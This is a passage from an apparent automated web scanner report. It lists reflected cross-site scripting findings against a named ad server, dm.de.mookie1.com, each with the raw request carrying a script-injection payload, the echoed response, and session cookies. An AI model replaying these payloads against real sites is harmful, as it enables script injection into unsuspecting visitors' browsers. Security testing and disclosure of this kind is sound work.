Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMb4479"><script>alert(1)</script>e92a94cc08f/2010DM/34071882/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IM
...[SNIP]...

4.345. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b208b"><script>alert(1)</script>a1467d27b2b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMb208b"><script>alert(1)</script>a1467d27b2b/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMb208b"><script>alert(1)</script>a1467d27b2b/1735241096/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.346. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac744"><script>alert(1)</script>72c75e8abaa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/11940003036@x23ac744"><script>alert(1)</script>72c75e8abaa?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/1273799110/x23ac744"><script>alert(1)</script>72c75e8abaa/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.347. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a24a5"-alert(1)-"0b090863dfc was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160a24a5"-alert(1)-"0b090863dfc HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160a24a5"-alert(1)-"0b090863dfc";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.348. http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/11940003036@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861ee"-alert(1)-"97f1109ca7d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/11940003036@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160&861ee"-alert(1)-"97f1109ca7d=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Right&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660; session=1296251852|1296251858

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_160&861ee"-alert(1)-"97f1109ca7d=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.349. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76e2e"><script>alert(1)</script>d6d52f497d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM76e2e"><script>alert(1)</script>d6d52f497d8/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM76e2e"><script>alert(1)</script>d6d52f497d8/2010DM/125451304/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.350. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f784"><script>alert(1)</script>ebe5c348809 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM9f784"><script>alert(1)</script>ebe5c348809/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM9f784"><script>alert(1)</script>ebe5c348809/421479954/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.351. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa3cd"><script>alert(1)</script>938a4db3496 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12000985820@x23aa3cd"><script>alert(1)</script>938a4db3496?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:30 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM/2059577805/x23aa3cd"><script>alert(1)</script>938a4db3496/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.352. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e64e"-alert(1)-"ec42b83e34b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_3003e64e"-alert(1)-"ec42b83e34b HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:00:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2483
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3003e64e"-alert(1)-"ec42b83e34b";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to ch
...[SNIP]...

4.353. http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12000985820@x23

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 796f4"-alert(1)-"69e83c326b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /2/B3DM/2010DM/12000985820@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300&796f4"-alert(1)-"69e83c326b1=1 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262268

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:14 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2486
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}
var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&796f4"-alert(1)-"69e83c326b1=1";

camp=camp.toUpperCase();

if((camp.indexOf("AOL") == -1 )&&(camp.indexOf("GGL")) == -1){
if((cookie_check("dlx_20100929=",document.cookie)).length == 0) {

// Set cookie with marker to
...[SNIP]...

4.354. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc6a0"><script>alert(1)</script>b7139dead4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMdc6a0"><script>alert(1)</script>b7139dead4e/2010DM/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMdc6a0"><script>alert(1)</script>b7139dead4e/2010DM/879154918/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><I
...[SNIP]...

4.355. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d35df"><script>alert(1)</script>5db05569f10 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DMd35df"><script>alert(1)</script>5db05569f10/12037650882@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_en.ef.efm_qppm_iuuq=ffffffff09419e2145525d5f4f58455e445a4a423660; session=1296256112|1296262514

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DMd35df"><script>alert(1)</script>5db05569f10/1336908080/x23/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><
...[SNIP]...

4.356. http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://dm.de.mookie1.com
Path:	/2/B3DM/2010DM/12037650882@x23

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e3d8"><script>alert(1)</script>d4d7bda2c35 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM/12037650882@x235e3d8"><script>alert(1)</script>d4d7bda2c35?USNetwork/RS_SELL_2011Q1_AOL_CPA_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
